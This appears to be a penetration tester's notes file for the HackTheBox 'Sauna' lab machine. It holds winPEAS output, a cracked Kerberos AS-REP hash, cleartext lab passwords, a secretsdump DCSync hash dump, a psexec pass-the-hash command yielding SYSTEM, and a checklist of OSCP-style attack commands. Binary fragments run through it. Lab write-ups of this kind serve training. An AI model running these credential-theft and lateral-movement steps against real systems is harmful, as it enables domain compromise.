PublicKeyToken=c416bc1b32d97233' at winPEAS.ApplicationInfo.GetScheduledAppsNoMicrosoft() at winPEAS.Program.<PrintInfoApplications>g__PrintScheduled|44_3() WRN: Assembly binding logging is turned OFF. To enable assembly bind failure logging, set the registry value [HKLM\Software\Microsoft\Fusion!EnableLog] (DWORD) to 1. Note: There is some performance penalty associated with assembly bind failure loggin;g. To turn this feature off, remove the registry value [HKLM\Software\Microsoft\Fusion!EnableLog].   =========================================(Network Information)=========================================  [+] Network Shares(T1135)  [X] Exception: Access denied   [+] Host File(T1016)  [+] Network Ifaces and known hosts(T1016)  [?] The masks are only for the IPv4 addresses  Ethernet0[00:50:56:B9:0E:F9]: 10.10.10.175, fe80::89a7:e1b:148f:2260%8, dead:beef::89a7:e1b:148f:2260 / 255.255.255.0 Gateways: 10.10.10.2, fe80::250:56ff:feb9:f9ab%8 DNSs: ::1, 127.0.0.1 Known hosts: 10.10.10.2 00-50-56-B9-F9-AB Dynamic 10.10.10.255 FF-FF-FF-FF-FF-FF Static 224.0.0.22 01-00-5E-00-00-16 Static 224.0.0.251 < 01-00-5E-00-00-FB Static 224.0.0.252 01-00-5E-00-00-FC Static Loopback Pseudo-Interface 1[]: 127.0.0.1, ::1 / 255.0.0.0 DNSs: fec0:0:0:ffff::1%1, fec0:0:0:ffff::2%1, fec0:0:0:ffff::3%1 Known hosts: 224.0.0.22 00-00-00-00-00-00 Static  [+] Current Listening Ports(T1049&T1049)  [?] Check for services restricted from the outside  Proto Local Address Foreing Address State TCP 0.0.0.0:80 Listening TCP 0.0.0.0:88 Listening TCP 0.0.0.0:135 Listening TCP 0.0.0.0:389 Listening TCP 0.0.0.0:445 Listening TCP 0.0.0.0:464 Listening TCP 0.0.0.0:593 = Listening TCP 0.0.0.0:636 Listening TCP 0.0.0.0:3268 Listening TCP 0.0.0.0:3269 Listening TCP 0.0.0.0:5985 Listening TCP 0.0.0.0:9389 Listening TCP 0.0.0.0:47001 Listening TCP 0.0.0.0:49664 Listening TCP 0.0.0.0:49665 Listening TCP 0.0.0.0:49666 Listening TCP 0.0.0.0:49667 Listening TCP 0.0.0.0:49673 Listening TCP 0.0.0.0:49674 Listening TCP 0.0.0.0:49675 Listening TCP 0.0.0.0:49678 Listening >TCP 0.0.0.0:49686 Listening TCP 0.0.0.0:49696 Listening TCP 10.10.10.175:53 Listening TCP 10.10.10.175:139 Listening TCP 127.0.0.1:53 Listening TCP [::]:80 Listening TCP [::]:88 Listening TCP [::]:135 Listening TCP [::]:389 Listening TCP [::]:445 Listening TCP [::]:464 Listening TCP [::]:593 Listening TCP [::]:636 Listening TCP [::]:3268 Listening TCP [::]:3269 ? Listening TCP [::]:5985 Listening TCP [::]:9389 Listening TCP [::]:47001 Listening TCP [::]:49664 Listening TCP [::]:49665 Listening TCP [::]:49666 Listening TCP [::]:49667 Listening TCP [::]:49673 Listening TCP [::]:49674 Listening TCP [::]:49675 Listening TCP [::]:49678 Listening TCP [::]:49686 Listening TCP [::]:49696 Listening TCP [::1]:53 Listening@ TCP [dead:beef::89a7:e1b:148f:2260]:53 Listening TCP [fe80::89a7:e1b:148f:2260%8]:53 Listening UDP 0.0.0.0:123 Listening UDP 0.0.0.0:389 Listening UDP 0.0.0.0:5353 Listening UDP 0.0.0.0:5355 Listening UDP 10.10.10.175:53 Listening UDP 10.10.10.175:88 Listening UDP 10.10.10.175:137 Listening UDP 10.10.10.175:138 Listening UDP 10.10.10.175:464 Listening UDP 127.0.0.1:53 Listening UDP 127.0.0.1:50760 Listening UDP 127.0.0.1:51176 A Listening UDP 127.0.0.1:52066 Listening UDP 127.0.0.1:53929 Listening UDP 127.0.0.1:54536 Listening UDP 127.0.0.1:55904 Listening UDP 127.0.0.1:59436 Listening UDP 127.0.0.1:61404 Listening UDP [::]:123 Listening UDP [::]:389 Listening UDP [::1]:53 Listening UDP [::1]:61405 Listening UDP [dead:beef::89a7:e1b:148f:2260]:53 Listening UDP [dead:beef::89a7:e1b:148f:2260]:88 Listening UDP [dead:beef::89a7:e1b:148f:226B0]:464 Listening UDP [fe80::89a7:e1b:148f:2260%8]:53 Listening UDP [fe80::89a7:e1b:148f:2260%8]:88 Listening UDP [fe80::89a7:e1b:148f:2260%8]:464 Listening  [+] Firewall Rules(T1016)  [?] Showing only DENY rules (too many ALLOW rules always)  Current Profiles: PUBLIC FirewallEnabled (Domain): True FirewallEnabled (Private): True FirewallEnabled (Public): True  DENY rules:  [+] DNS cached --limit 70--(T1016)  Entry Name Data  [X] Exception: Access denied   =========================================(Windows Credentials)=========================================  [+] Checking Windows VaCult()  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault [ERROR] Unable to enumerate vaults. Error (0x1061)  Not Found  [+] Checking Credential manager()  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-manager-windows-vault  This function is not yet implemented.  [i] If you want to list credentials inside Credential Manager use 'cmdkey /list'  [+] Saved RDP connections()  Not FoundD[0m  [+] Recently run commands()  Not Found  [+] PS default transcripts history()  [i] Read the PS histpry inside these files (if any)  [+] Checking for DPAPI Master Keys()  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi  MasterKey: C:\Users\FSmith\AppData\Roaming\Microsoft\Protect\S-1-5-21-2966785786-3096785034-1186376766-1105\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f  Accessed: 1/24/2020 6:30:19 AM  Modified: 1/24/2020 6:30:19 AM  =================================================================================================  [+] Checking for Credential Files()  [?]  3mhttps://book.hacktricks.xyz/windows/windows-local-privilege-escalation#dpapi  Not Found  [+] Checking for RDCMan Settings Files()  [?] Dump credentials from Remote Desktop Connection Manager https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager  Not Found  [+] Looking for kerberos tickets()  [?]  https://book.hacktricks.xyz/pentesting/pentesting-kerberos-88  [X] Exception: OFbject reference not set to an instance of an object.  Not Found  [+] Looking saved Wifis()  This function is not yet implemented.  [i] If you want to list saved Wifis connections you can list the using 'netsh wlan show profile'  [i] If you want to get the clear-text password use 'netsh wlan show profile <SSID> key=clear'  [+] Looking AppCmd.exe()  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#appcmd-exe  AppCmd.exe was found in C:\Windows\system32\inetsrv\appcmd.exe You should try to search for credentials  [+] Looking SSClient.exe()  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#scclient-sccm  Not Found  [+] Checking AlwaysInstallElevated(T1012)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated  AlwaysInstallElevated isn't available  [+] Checking WSUS(T1012)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus  Not Found  ========================================(Browsers InformaHtion)========================================  [+] Looking for Firefox DBs(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  Not Found  [+] Looking for GET credentials in Firefox history(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  Not Found  [+] Looking for Chrome DBs(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  Not Found  [+] Looking for GET credentials in Chrome history(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  Not Found  [+] Chrome bookmarks(T1217)  Not Found  [+] Current IE tabs(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  [X] Exception: System.Reflection.TargetInvocationJException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A) --- End of inner exception stack trace --- at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters) at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams) at winPEAS.KnownFileCredsInfo.GetCurrentIETabs()  Not Found  [+] Looking for GET credentials in IE history(T1503)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#browsers-history  [+] IE favorites(T1217)  Not Found  ==============================(Interesting files and registry)==============================  [+] Putty Sessions()  Not Found  [+] Putty SSH Host keys()  ssh-ed25519@22:10.10.14.10:   =================================================================================================  [+] SSH keys in registry()  [?] If you find anything here, follow the link to learn how to decrypt the SSH keys https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#ssh-keys-iLn-registry  Not Found  [+] Cloud Credentials(T1538&T1083&T1081)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files  Not Found  [+] Unnattend Files()  [+] Powershell History()  [+] Looking for common SAM & SYSTEM backups()  C:\Windows\System32\config\RegBack\SAM  C:\Windows\System32\config\RegBack\SYSTEM  [+] Looking for McAfee Sitelist.xml Files()  [+] Cached GPP Passwords() [X] Exception: Could not find a part of the path 'C:\ProgramData\Microsoft\Group Policy\History'. 33m [+] Looking for possible regs with creds(T1012&T1214)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#inside-the-registry  Not Found  Not Found  Not Found  Not Found  [+] Looking for possible password files in users homes(T1083&T1081)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml  [+] Looking inside the Recycle Bin for creds files(T1083&T1081&T1145)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files  Not Found  [+] Searching known files that can contain creds in home(T1083&T1081)  [?]  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#credentials-inside-files  [+] Looking for documents --limit 100--(T1083)  Not Found  [+] Recent files --limit 70--(T1083&T1081)  Not Found custom-colorsXAIZ|xA/`щ7  )''  Script ResultsANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD  Creating Dynamic lists, this could take a while, please wait...  - Checking if domain...  - Getting Win32_UserAccount info... Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied at System.Management.ThreadDispatch.Start() at System.Management.Man X#X/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* \OOO G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*T)'   Users & GroupsUsers /usr/bin/impacket-sW.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg Q^Qg'  Goodiescustom-colorsVA?& c6+e'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Local.txt File ☐ +a'   Priv EscalationService Exploited:X)c'  Scheduled JobsScheduled Taskscustom-colors$ANl JJ3'   Hashes$ cat npu_out.txt $krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:20bd5c190cedef6b5d04fd60bae4b3ba$86a4dc0a71d48b8a4f98db4771c8d6dc71b8ad0af863acd6beeb940462 dcedacb43246a2ca0d794485f0a82a000883c9621dddfa813c40448f20448cb3ce642613c5c01d4d68c5ab0c402c98093cc121af18377ae1 sudo john --wordlist=/usr/share/wordlists/rockyou.txt ./npu_out.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL) 1g 0:00:00:11 DONE (2020-08-03 19:22) 0.09041g/s 952894p/s 952894c/s 952894C/s Thrall..Thehunter22 Use the "--show" option to display all of the cracked passwords reliably Session completedcustom-colors$A' ZJ4/'  Proof\Flags\OtherC:\Windows\system32>type C:\Users\fsmith\Desktop\user.txt 1b5520b98d97cf17f24122a55baf70cf C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt f3ee04965c68257382e31502cc5e881fcustom-colors$Aԥp /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x#u'  Passwordsfsmith:Thestrokes23 svc_loanmgr:Moneymakestheworldgoround!custom-colors$AvUich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaVddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ.,ecretsdump -just-dc-ntlm egotisticalbank/svc_loanmgr@10.10.10.175 Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation Password: [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c::: EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd::: EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c::: SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:b8823d792ba1fbfa1db68d93318b243e::: [*] Cleaning up... Groupscustom-colors$AH`Y Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used python3 /usr/share/doc/python3-impacket/examples/psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.175..... [*] Found writable share ADMIN$ [*] Uploading file BfdjSbpN.exe [*] Opening SVCManager on 10.10.10.175..... [*] Creating service zBSJ on 10.10.10.175..... [*] Starting service zBSJ..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.973] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32>hostname SAUNA C:\Windows\system32>ipconfig Windows IP Configuration Ethernet adapter Ethernet0: Connection-specific DNS Suffix . : IPv6 Address. . . . . . . . . . . : dead:beef::80ac:2dec:28a4:a668 Link-local IPv6 Address . . . . . : fe80::80ac:2dec:28a4:a668%8 IPv4 Address. . . . . . . . . . . : 10.10.10.175 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f9ab%8 10.10.10.2 C:\Windows\system32>type C:\Users\fsmith\Desktop\user.txt 1b5520b98d97cf17f24122a55baf70cf C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt f3ee04965c68257382e31502cc5e881f C:\Windows\system32> Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAԬ [[h  ' Log Bookcustom-colors(AI^ɚ(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree